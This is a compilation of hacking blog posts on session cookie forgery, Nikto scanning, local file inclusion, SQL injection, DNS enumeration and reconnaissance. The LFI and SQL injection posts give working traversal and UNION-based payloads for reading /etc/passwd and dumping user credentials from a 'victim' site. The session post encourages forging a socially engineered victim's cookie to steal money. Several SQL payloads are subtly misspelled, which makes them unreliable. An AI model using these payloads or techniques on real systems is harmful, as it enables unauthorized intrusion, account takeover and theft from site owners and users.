Breaking The sessions

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Sessions are important for security. If an attacker can break a session/cookie of a active user then he or she can access that account as the user without any password. Some attackers don’t care about it because maybe they don’t know much about it or they feel boring. But how a serious hacker take advantage ? Just they want to get the password easily or by just a sql injection? No, It is not. Actually  a serious hacker look for a hint(Simple vulnerability+Free simple tools) which can make him to go ahead. Anyway, I will explain a little about breaking the sessions because you need to research yourself to learn something good.

When we deal with sessions :

When We can register to a website, Can login, transfer data etc. The session is active until we log out. If the site does not manage sessions for a active account then we may need to log in every second.
Anyway, when the user login and the website save the sessions for next time login(Cookie?). What about when we see like “Keep me logged in always in this site” ? If you even brows the site after 3 days then still you will see that you are logged in without username and password. So If we attempt to log in for first time against a website then the site will do:

1.
set a cookie = dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

2. Session= dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

  So i think that now you know how “session” works.

If the session is compromised by someone then he/she can use this session to log in against the user without any password.

How A hacker can break the sessions:

There are Some way breaking the sessions. Developer often doing mistake when managing the sessions. Most vulnerablites are :

1. Time based.
2. Meaningful
3. Predictable.

Just for understanding i am explaining “Meaningful session vulnerability”

Suppose we logged to our bank “www.bank.com” and our username is “exploit” and password “SecUritYY” . After logged on the site we saw on the address bar , the url is like:

http://www.bank.com/accounts/hacker/test/index.php?phpsessionid=dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7
It is really doubtful the URL address. It is using base64 as session id. So if we decode the base64 value then we get:

user=exploit;email=sec@domain.com;ip=1.1.1.1;

We see some juicy information but not the password. But still we can use this session to attack other accounts.How?

If we know any correct username,email,ip(Require some social engineering?) then we can make a new session to break the target account. For example, Our victim’s information(I got some information by SE):

user: dollar
email: giveme@victime.org
ip: 1.1.1.2 (Lol This fool clicked on a link)

Now we can encode these information as base64 and edit your cookie or submit directly on URL bar(Because it is GET method). I really hope you logged in then transfer some $$$ to your account? 😉

Hope you understand something about attacking the session…

Special Note: You should research seriously otherwise you will not learn anything from a ready tutorial(Such as free tutorial). You should find out the way from a very simple hint. Don’t think anyone will do everything for you. Just remember, Self help is best help(Just sometime need hints?)

If you get any mistake/errors then please feel free to contact me(I love to fix myself)

Good Luck guys!!!

My favorite website which may help you a lot for learning Computer exploit and Hacking

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

1. Exploit Writng :

I love this site. A lot of information and tutorials. If you are interest to write exploits then go to corelan. There are currently 11 exploit writing tutorial which is basic to advance and even better than others commercial course .

Thanks peter (respect)

2. Vulnerability Research:

If you are serious then you need these site. We always need to search new/old vulnerability. So these site are very good for starting:

2.1. Exploit-db
2.2. securitfocus
2.3. osvdb.org
2.4. web.nvd.nist.gov

3. Metasploit:

Metasploit is popular framework for pentesting. Metasploit is very useful for quick shellcoding .

Nikto web vulnerability scanner.

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Most of time i use nikto for scanning Targets website. It is easy but really powerful . Sometime it is sucks too , because of false positive. Just i will show how to scan your own site . It scan cgi and default file and directory.

Warning:Don’t do anything illegal, I am just sharing that how i practices . If you are black hat hacker and going attack third party website , or doing anything illegal then i am not Responsible for that…

I believe Sharing knowledge mean increasing knowledge .  

Nikto is a perl script. So we need to install perl for playing this (Be aware windows users). If you don’t have this tool yet then go and download it:
http://cirt.net/nikto2 . It is default installed in Backtrack .

Simply ,

root@bt:cd /pentest/web/nikto

root@bt:/pentest/web/nikto# ./nikto.pl -Help

   Options:
       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don’t ask, don’t send
                               auto  Don’t ask, just send
       -Cgidirs+           Scan these CGI dirs: “none”, “all”, or values like “/cgi/ /cgi-a/”
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator ()
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
        -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes–treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nocache           Disables the response cache
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Single            Single request mode
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval – Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval – Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
                + requires a value

If we give command ./nikto.pl -Help or perl nikto.pl -Help then we get details and all options.

Simply We are going to scan our own company’s website … because we are pentesting it. So easy:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com :

I have tested it on my localhost for pasting here, There are output/vulnerability we may get:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
– Nikto v2.1.5
—————————————————————————
+ Target IP:          ip address
+ Target Hostname:    target.com
+ Target Port:        80
+ Start Time:         2012-01-21 13:48:22 (time formate)
—————————————————————————
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Retrieved x-powered-by header: PHP/5.2.17
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ FrontPage – http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm — a DoS was not attempted.
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ Default account found for ‘Secured Frontpage on PennyStockAdvice.com’ at /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals (ID ”, PW ‘_Cisco’). Cisco device.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /stats/: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ OSVDB-3092: /as/: This might be interesting… potential country code (American Samoa)
+ OSVDB-3092: /ms/: This might be interesting… potential country code (Montserrat)
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time:           2012-01-21 13:58:55 (Time formate) (4233 seconds)
—————————————————————————
+ 1 host(s) tested

  As you can see there are many thing Nikto found out. Nikto is very effective for finding default file,directory.

Note: you have to understand the output of tools otherwise you can do nothing.

we can use various options(see help)…. For example a command:

root@bt:/pentest/web/nikto#./nikto.pl -host target.com -root /admin -port 443 -evasion 1

How is this working ? Simple:
-host=-h(The target site)
-root=send all request to /admin directory
-port = The site is not running on default 80 , I know it is running on 443.
-evasion=IDs evasion.  Evasion 1(Random URI encoding (non-UTF8))

I hope you got some idea about it… Just try to believe that Learning to use tools peoples does not need hacking training.

If your mind is skid then tools may not help you.. . Be aware about that before using tools .

For more information Visit  http://cirt.net/nikto2

Good Luck!!!

Exploiting Local File Inclusion vulnerability(LFI)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Local File Inclusion mean loading local file such as /etc/passwd , /etc/host on the php web pages. There are many programing mistake for occurring this vulnerability. When Programer put some bad in the php web pages that time this vulnerable occur:

include
include_once
require
require_once
fopen

For example, suppose in a pages :

 
<?
$vulnerable = $_GET[vulnerable];
include
($vulnerable); #this maybe require,require_once, fopen etc
?>

This is code is vulnerable to Local file inclusion vulnerable.

Suppose , Our target url is www.n00bprogammer.com/vulnerable/

If you directly submit this url on browser address bar then you get web page , That’s mean there is a file “index.php”

If we try like :

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That’s mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)… So there is no permission then you can’t read /etc/shadow file.

There are many file you may interest to read :

/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
/var/log/apache/access_log 
/var/log/apache2/access_log 
/var/log/apache/access.log 
/var/log/apache2/access.log
 /var/log/access_log
 
 
There are many sites which have unnecessary url variable with file extension... They use the value 
  php,images,asp file. This is not secure at all. For example :

www.target.site/vulnerable.php?=image.jpeg

This maybe also vulnerable to LFI... Try.

Advance hackers can go more deeply. Such as: 

1. There are some special way attacking application tier for rooting the system(Hint: overwriting error_log).
2. Reading more advance file (Hint: SQL).

Try them , Research and learn...
 
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any question please...


SQL injection explained

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today i will explain the SQL injection. Input based attack is most effective for testing web security. And the SQL is most popular for web hacking. No wait, Let’s start(Hey, i am not going to explain what is SQL injection; it is how to exploit).

Testing if the target is vulnerable :

Suppose the target site is http://www.victim.com. We can quickly gather some information by Google for finding some parameters based URL. Simply if go to google and search like :

site:www.victim.com filetype:php

(Note: I think you already gathered some information against the site . So you know what is their file extension . If you are attacking randomly then go away from here.)

Then we see many result like:
www.victim.com/index.php

www.victim.com/something.php?id=3

etc

Simply browse the www.victim.com/something.php?id=3 and add one more thing . Example:

www.victim.com/something.php?id=3

If the site is vulnerable then we will see SQL error like:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” AND products.obsolete=’N” at line 1

If we see this error on that page then we are confirm the site is vulnerable and exploitable. 






Next ATTACK

Finding the columns Number:

First we will check that how column is available by “ORDER BY” query. If we reach the more than available columns then we will get error “Unknown Column”.

No error:

www.victim.com/something.php?id=3 ORDER BY 4–



No error:

www.victim.com/something.php?id=3 ORDER BY 5–



Error:

www.victim.com/something.php?id=3 ORDER BY 6–



Now we are confirm that it has 6 columns . If you get no error then try more columns 7,8,9  etc.

How to find the Vulnerable column

To find the Vulnerable columns we need “UNION SELECT” command. So:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,5,6–

Now we will see 1-6(Anyone or multiple) number on pages. Suppose we see it is “5”

So now we know the column number 5 is vulnerable.

Checking the MySQL version :

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,@@version,6–

We know the MySQL version is 5(version 4 won’t work).

Great ! now We quickly need their Users database dump. So quick !!!

Now we need the all tables name

Getting Tables Name  

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_scheam=database()–

So we get several tables name. For example we get :

links
pages
tokens
visitor

creditcard

users
transaction

etc…

We want to logging as a powerful user so that we can edit their pages. To do this first we need to find out columns name:

Getting Columns name:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(columns_name),6 from information_schema.tables where table_name=users–

 
So from this query we get output like :

id
username
email
firstname
lastname
password
link

It is simply understandable that we need username and password columns for getting admin access:

Grabbing The username and password:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(username,0x3a,password),6 from users–

So you get output all username and password like, admin:akde3d09kd4ur489deqa9094ldad48dkr 

super:54ee3d09kd4ur489deqa9094ldad4u78l

Now crack the hash and then logging with username  “admin” or “super” and plain text(Cracked).

If you don’t know how to crack hash check out other articles…

There are many sql injection technique …. but I explained here which is very common. So try more , research and research.

I hope there are some mistake i made… If you can catch them then feel free to contact me..

Good Luck!!!

DNS Enumeration

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today I will show you how to enumerate DNS using various tools. These freely downloadable from Internet. Every Penetration testers know that By Enumerating DNS it is possible to get some important public (May be sometime Private information too) information such as Server name, Server IP address, Sub-domain etc. Anyway, Lets use some tools.

Tool-1 : dnsenum.pl

Download here: http://code.google.com/p/dnsenum/downloads/detail?name=dnsenum-1.2.2.tar.gz&can=2&q= 

1.
Simply open terminal and cd to the dnspath(cd /pentest/enumeration/dns/dnsenum) . If you enter this simple command “./dnsenum.pl” then you will get all options to be use:

So simply we can use this command to enumerate : ./dnsenum.pl target.com.
I was run against google just to take a screenshot :

Screen shot2:

dnsenum outputted some valuable information. But in last it said “brute force file not specified, bay.” This mean that it can take a wordlist for brute forcing the all sub-domain.

So you just need to do : root@pentest: ./dnsenum.pl -f /your/path/of/dictionary.lst target.com

Just read the output of any tools and try to understand. You will see that you fixed any simple program yourself . Actually learning to use tools you don’t need any teacher.

Another tool : fierce.pl
Simply run

root@pentest: fierce.pl -dns target.net

This tool also capable for taking wordlist for brute forcing :
root@pentest: ./fierce.pl -dns target.net -wordlist /path/word.txt

You can also use nslookup:

rbage@pentest:~$ nslookup
> google.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   google.com
Address: 74.125.235.17
Name:   google.com
Address: 74.125.235.19
Name:   google.com
Address: 74.125.235.20
Name:   google.com
Address: 74.125.235.16
Name:   google.com
Address: 74.125.235.18
> set type=mx
> google.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
google.com      mail exchanger = 50 alt4.aspmx.l.google.com.
google.com      mail exchanger = 40 alt3.aspmx.l.google.com.
google.com      mail exchanger = 30 alt2.aspmx.l.google.com.
google.com      mail exchanger = 20 alt1.aspmx.l.google.com.
google.com      mail exchanger = 10 aspmx.l.google.com.

Authoritative answers can be found from:
> set type=ns
> google.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
google.com      nameserver = ns4.google.com.
google.com      nameserver = ns1.google.com.
google.com      nameserver = ns2.google.com.
google.com      nameserver = ns3.google.com.

Authoritative answers can be found from:
>

There are many tools for enumerating dns:
dnswalk : http://sourceforge.net/projects/dnswalk/
host: It is built in with Linux
dnsmap: http://code.google.com/p/dnsmap/
 etc.

Try them….

Web Hacking tools

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

You can get full list of the hacking tools from Here

Burp suite
Download : http://portswigger.net/burp/download.html

Owasp-zap
Download: http://code.google.com/p/zaproxy/downloads/list

DirBuster:
Download: https://sourceforge.net/projects/dirbuster/
Acunitix
Download: http://www.acunetix.com/vulnerability-scanner/download.htm

w3af
Download: http://www.w3af.sourceforge.net

Nikto 
Download: http://www.cirt.net/nikto2 

Sqlmap 
Download: http://sqlmap.sourceforge.net

Tamper Data
Download: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 

Live HTTP Header 
Download: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

Cookie Monster 
Download: https://addons.mozilla.org/en-US/firefox/addon/cookie-monster/

Hackbar 
Download: https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Hydra 
Download: http://thc.org/thc-hydra/ 

These are most important tools for attacking website(i think these are enough). If you want to work with only tools then There are lots of tools freely downloadable. Visit: HERE



Gathering Information before hacking website.

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Before attacking(pentesting) a website we must need to gather some important value and then mapping the attack surface. If we don’t understand how the site is working, what is available on the site, what type of input it takes etc then we will not be able to  make a good attack(Rarely success without passing gathering information). Many skid exist around us who just start looking for SQL injection or start brute forcing the web form and at least fail .
Gathering information and mapping the site is very very important So i will explain(not very details) how to, what looks for etc.

Spidering the web:

Basically i look for links, web form, source code, directory etc.
There are many tools you spider target website. But I prefer a proxy tools such Burp suit,owasp-zap and a downloader wget .

We may find out many important information from spidering the target.

Screen shot of Burp suit:

burp suite spidering

Burp suite spiderd some important link which we nee for later attack(Directory,login page, password forgotten pages, robots.txt etc) .

Configuring the burp suite for spider the web :

1. Open the burp suite .
2. Configure your browser as proxy for burp suite>> Firefox: preference>>Advance>>Network>>Setting>>Manual proxy configuration and enter host: localhost and port: 8080

Screen shot:

 
3. Now browser your target website. And you will see your target address in the burp suite proxy’s target menu.
4. Now right click on your target host from burp then click on the “Spider this host”

Screen shot:

Now it will spider the website.Note:play more with burp suite.

Now we know to configure browser for burp suite and spidering the target host. So let’s continue gathering information.

It is more good thing downloading the entire website using wget or other downloader so that we can browse it offline see the page source code, comment etc. Besides we may need to brute force the web form or anything and creating word list from the target site. So Simply i use wget :

wget -r www.target.com

And it will download the full website. Now browse all pages, see source code, coment etc and see if you i/you get any good information .

Information Gathering with Google:

Google is very powerful search engine and friend for hackers and penetration testers. We can gather many information by google easily. Such as all public information, email, parameter of the site, name, phone etc.

If we search on google with operator ‘site’ then we get many result :

https://www.google.com/#sclient=psy-ab&hl=en&source=hp&q=site:microsoft.com&fp=2f63d2df457619ac

Click on the link and you will see.

I have searched : site:microsoft.com thats why it discovered subdomain. But if we search “site:www.microsoft.com” then we will see result from only www.microsft.com , not for other sub-domains such as login.microsoft.com

More example :
site:www.targets.com filetype:asp
site:www.targets.com inurl:index.php
site:targets.com error
site:targets.com admin
link:targets.com
related:targets.com

You will find many Google dork : http://www.exploit-db.com/google-dorks/
Don’t be lazy if you are serious.

There are some tools for automated search but i always prefer manually.

So suppose you found a url like : www.target.com/index.php?id=2 by search engine. So is not easy for quick check for invalid input on the “id” parameter(such as SQLi)?

Finding hidden file and content,default file:
You should browse all pages manually, review behavior for all pages. Here some point you can follow :
1. Brute force/Dictionary attack for hidden directory. You can use Burp suite or owasp DirBuster(I will post later about all tools tutorial).

2. See if you find any link like : www.target.com/login.php then there may be also logout.php, or if there is a www.taget.com/adduser.php then it may also exist www.target.com/deleteuser.php…. So try.

3. See the comment in the pages source for any interesting information.

4. Find out the login pages(admin+users).

5. Find out all url and save in a file for later uses.

6. Find out default file,content(What about www.target.com/phpinfo.php?).

7. I think you better run nikto against the site . Nikto is powerful tool for discovering default content.

Finding other information:
What is other information ?

1. Email(Social Engineering attack).

2. Phone number(Social Engineering).

3. Users and employee name(Social Engineering).

4. Find out the web server version. What version of apache, iis they are using? Perhaps if it is old then you may be lucky to find out some vulnerability on exploit-db,security focus for known vulnerability against the old software.

5. What type of web software are they using? Joomla, MyBB, PhpBB , Vbulletin or other? Do you know what version ? If these are old then you may search for vulnerability which already discovered before. 

I think you got some basic idea how to gather information and why you need to gather information. Without gathering information we can’t map our target. For example , If we don’t know how our victim walk, he knows the kung-fu or not(If  he knows kung-fu then we also need to be more powerful than him such as becoming expert Kung-Fu Fighter).
These are not only techniques for gathering information. You need more research about your target, Learn more techniques of information gathering, Use your powerful friend Google. I don’t think so that it is possible to discover some wealth information within a short time. Personally i spend lot of time for familiarizing with my target, spend a long time for gathering information and mapping the target. If you are skid/script kiddies and want to hack just for fun or it is not important for you then sure you have no patient and time for mapping your targets. But a serious hacker will spend lots of time(most of time) for his targets.   At least i hope that i explained most of important thing you need.

WITHOUT THESE INFORMATION YOU SHOULD NOT GO AHEAD .

Good Luck

How to learn Hacking or becoming a hacker

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I don’t know how expert i am but i believe these enough for becoming a hacker and i always try to follow them. So just sharing with you.

A) Programming:

1. Python/perl : Learn Python or Perl programming language. You need one of these two language . Do you know why ? For example , creating exploit, Making Custom tools etc.

2.C/C++: You should know this language. Because this will help you in many way. It is powerful language. Perhaps you already know that most of complex and powerful software coded in C/C++. And The Linux/Unix operating system language is created in C Language. For finding exploit or making some nasty thing you need this language.

3. Assembly Language: AH!!! Worry ? Don’t worry. It is not too hard for learning to read or understanding the code. Really you need asm if you are more serious about hacking. Without assembly language you will not be able to find the 0day against software , because debugger only output in asm code. Actually you don’t need to be coder but you should able to read it, understand it… Also if you want to know how computer internal works then best way to learn asm. So go with Intel Syntax and nasm.

4. PHP/SQL/Java script/html: If you want to move to Web hacking then learn at least 2 languages(PHP and MySQL). For example If you found php code injection vulnerable so how you will exploit it? Clear answer is you need PHP knowledge. And if you want to attack Client side then you need javascript and html knowledge, For example EXPLOITING password protected html pages , cros site scripting, Exploiting CSRF etc  . Have you ever heard about SQL injection ? Guess why i told you to learn SQL.Even If you want to find 0day for other framework like wordpress,joomla etc then you must need to have PHP/MySQL knowledge.

But if you are not serious about hacking and want to hack only for fun then some tools will do the job for you(this called skid and script kiddie), But be aware most of time(85%) you will be failed.

B) Networking:
Hackers hack over network(Internet?). So guess why you need to learn networking. You have to understand  how to connect, get familiar with ports, protocols etc. I suggest you to learn:
1. How network work + TCP/IP.
2. Protocols and port.
3. OSI model
C) Operating System:
Of course without operating system nothing is possible. And you must need to learn about operating system deeply. You should be very good in various OS . Earn some Internal knowledge about operating system. Run all existing tools of an OS. See how it works.
1. Linux: Ah , Linux is My first choice. I love Linux OS. It is Open source. Hacker should choice Open source operating system so that they can see the sources code, can modify , run various open source tools etc. I can’t explain lol, Get it right now!
2. Windows: Favorite target operating system for hackers. A lot of bugs and users over the world. Not open source. So you should learn it well. Still i read Windows assembly language and windows internal books instead Linux.
3.Mac:You may need it. But really i don’t know much about mac.
C) LAB:
1. Install 2 targets operating system. Linux(Get Ubuntu,Debain,Fedora,Redhat,OpenSuse etc) and windows. Don’t be fucker as some trainer doing with windows only as it is easy to exploit. So Linux also your target.
1. Install various software and tools. Run them . Learn them. See how it works. Install some security software, attack against your target system(Metasploit, nmap etc).
2. Install various networking software such as http,ftp,pop3,smtp,rdp,ssh,nntp etc and attack them and try to break them. try to find some bug such as BOF by Fuzzers . Even install other software For web hacking such as VB,MyBB,PhpBB , joomla etc and run Various tools against these application.
D) Journey:
Now You know what is going on and it is the time to start the journey. Now read some security/hacking books, Search on Google and you will see most of security hole occur from Programming and for networking problem. You will learn very fast. Just remember journey will not be end. So be careful taking enough food(Programming+Networking+OS+Motivation+patient) before starting the long journey.

Don’t give up!

Hope you will be one more genius !!!